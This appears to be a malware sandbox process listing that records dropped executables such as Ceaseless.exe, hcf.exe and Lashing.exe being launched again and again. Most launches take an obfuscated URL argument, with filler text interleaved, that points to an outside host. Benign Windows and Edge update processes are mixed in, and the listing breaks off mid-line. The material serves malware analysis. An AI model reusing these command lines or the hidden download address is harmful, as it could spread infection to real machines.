C:\Users\Admin\AppData\Local\Temp\nsb5FAE.tmp\Ceaseless.exe
C:\Users\Admin\AppData\Local\Temp\nsb5FAE.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
2⤵
PID:8692

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7064

C:\Users\Admin\AppData\Local\Temp\nsr3A92.tmp\Ceaseless.exe
C:\Users\Admin\AppData\Local\Temp\nsr3A92.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
2⤵
PID:7192

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:1412

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:5156

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6452

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6416

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:9484

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:8948

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8980

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8992

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:8760

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8876

C:\Users\Admin\AppData\Local\Temp\nsy307B.tmp\Ceaseless.exe
C:\Users\Admin\AppData\Local\Temp\nsy307B.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
2⤵
PID:8472

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9788

C:\Users\Admin\AppData\Local\Temp\nsh5EEE.tmp\Ceaseless.exe
C:\Users\Admin\AppData\Local\Temp\nsh5EEE.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
2⤵
PID:6260

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:5216

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4960

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4960 -s 3652
2⤵
- Program crash
PID:7488

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:7660

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 4960 -ip 4960
1⤵
PID:668

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6288

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8348

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:9504

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 9504 -s 3632
2⤵
- Program crash
PID:9252

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 420 -p 9504 -ip 9504
1⤵
PID:9844

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
1⤵
PID:9220

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3924

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3924 -s 3636
2⤵
- Program crash
PID:5600

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 532 -p 3924 -ip 3924
1⤵
PID:5284

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:2360

C:\Users\Admin\AppData\Local\Lashing.exe
C:\Users\Admin\AppData\Local\Lashing.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8136

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8368

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5972

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:5408

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:5300

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6072

C:\Users\Admin\AppData\Local\Temp\nsd79C4.tmp\Ceaseless.exe
C:\Users\Admin\AppData\Local\Temp\nsd79C4.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
2⤵
PID:8960

C:\Program Files (x86)\Sewer\Lashing.exe
"C:\Program Files (x86)\Sewer\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7584

C:\Program Files (x86)\Sewer\Ceaseless.exe
"C:\Program Files (x86)\Sewer\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7464

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6036

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:4016

C:\Program Files (x86)\Neurobiological\Ceaseless.exe
"C:\Program Files (x86)\Neurobiological\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5420

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9420

C:\Users\Admin\AppData\Local\Temp\nsi46CD.tmp\Ceaseless.exe
C:\Users\Admin\AppData\Local\Temp\nsi46CD.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
2⤵
PID:7400

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:9792

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:6616

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:8796

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 8796 -s 3668
2⤵
- Executes dropped EXE
- Program crash
- Suspicious use of SetWindowsHookEx
PID:1116

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 384 -p 8796 -ip 8796
1⤵
PID:9388

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:2776

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5152

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:6696

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6696 -s 3628
2⤵
- Program crash
PID:9656

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 512 -p 6696 -ip 6696
1⤵
PID:8272

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
1⤵
PID:7456

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E973D285-A13B-40F5-90D3-636D16F0AB18}\MicrosoftEdgeUpdateSetup_X86_1.3.177.11.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E973D285-A13B-40F5-90D3-636D16F0AB18}\MicrosoftEdgeUpdateSetup_X86_1.3.177.11.exe" /update /sessionid "{DA7C49E8-3FC5-48B2-9A3C-FC7E8AC3B015}"
2⤵
PID:10060

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzUuMjciIHNoZWxsX3ZlcnNpb249IjEuMy4xNzUuMjciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7REE3QzQ5RTgtM0ZDNS00OEIyLTlBM0MtRkM3RThBQzNCMDE1fSIgdXNlcmlkPSJ7NzhDN0Q1NTMtNEI2Ni00RTEzLUI0QTctNDNGOUM2Mzc1RkQyfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9Ins0NEFBMzNBRS05Mzk3LTRGNDYtQjE2OC1EMDhFMzBFRjQ2NDl9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O3FXSlN6V3dQZmRjTFIrWEdJdjZ4clpmaVlPeGhQVTJzMU5XbWpXY2FGUGc9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xNzUuMjciIG5leHR2ZXJzaW9uPSIxLjMuMTc3LjExIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9IlByb2R1Y3RzVG9SZWdpc3Rlcj0lN0JGMzAxNzIyNi1GRTJBLTQyOTUtOEJERi0wMEMzQTlBN0U0QzUlN0QiIGluc3RhbGxhZ2U9IjAiPjx1cGRhdGVjaGVjay8-PGV2ZW50IGV2ZW50dHlwZT0iMTIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjExMjYxNDY0NDUxIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjExMjYyNzE0NDEwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIwIiBlcnJvcmNvZGU9Ii0yMTQ3MDIzODM4IiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxNTM4NzAzNzA4NiIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iZG8iIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzL2U5YjQyNmI5LTA3ZjgtNGIyOS05MzVjLWQ5MWE1OWJiNzhiYT9QMT0xNjkwNDQzODg5JmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PWRKS21SQzlMUHBDQXk1a0RVamk5UEVTQ1hldGVWTkhvMjhMcmE0JTJiYWx4biUyYlgyMlBzN3JMQ3NTRkx4S3FRWlFuNTdaeENLODBQR0N4MnhjNGNGaVdtdyUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjAiIHRvdGFsPSIwIiBkb3dubG9hZF90aW1lX21zPSIxNTciLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjAiIGVycm9yY29kZT0iLTIxNDMwOTI2ODciIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE1Mzg3MDY3MTI3IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuYi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy9lOWI0MjZiOS0wN2Y4LTRiMjktOTM1Yy1kOTFhNTliYjc4YmE_UDE9MTY5MDQ0Mzg4OSZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1kSkttUkM5TFBwQ0F5NWtEVWppOVBFU0NYZXRlVk5IbzI4THJhNCUyYmFseG4lMmJYMjJQczdyTENzU0ZMeEtxUVpRbjU3WnhDSzgwUEdDeDJ4YzRjRmlXbXclM2QlM2QiIHNlcnZlcl9pcF9oaW50PSIiIGNkbl9jaWQ9Ii0xIiBjZG5fY2NjPSIiIGNkbl9tc2VkZ2VfcmVmPSIiIGNkbl9henVyZV9yZWZfb3JpZ2luX3NoaWVsZD0iIiBjZG5fY2FjaGU9IiIgY2RuX3AzcD0iIiBkb3dubG9hZGVkPSIzMzUiIHRvdGFsPSIxNTk4OTQ0IiBkb3dubG9hZF90aW1lX21zPSI0MDk1MzgiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTUzODcwODcxMTgiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9Indpbmh0dHAiIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzL2U5YjQyNmI5LTA3ZjgtNGIyOS05MzVjLWQ5MWE1OWJiNzhiYT9QMT0xNjkwNDQzODg5JmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PWRKS21SQzlMUHBDQXk1a0RVamk5UEVTQ1hldGVWTkhvMjhMcmE0JTJiYWx4biUyYlgyMlBzN3JMQ3NTRkx4S3FRWlFuNTdaeENLODBQR0N4MnhjNGNGaVdtdyUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IjcyLjIxLjgxLjIwMCIgY2RuX2NpZD0iMTEiIGNkbl9jY2M9IlVTIiBjZG5fbXNlZGdlX3JlZj0iUmVmIEE6IEFGNkFGNzU4Q0YwQTQxQ0M4RTEwREZEQjkyNjBDQTEyIFJlZiBCOiBFV1IzMTEwMDAxMDMwNDUgUmVmIEM6IDIwMjMtMDctMDFUMDA6Mjg6NTZaIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IlJlZiBBOiAwMDIzNDdCNEVBRjE0NDI2OEQwMTlEMkJFRjczQUU3NyBSZWYgQjogTU5aMjIxMDYwNjA1MDA3IFJlZiBDO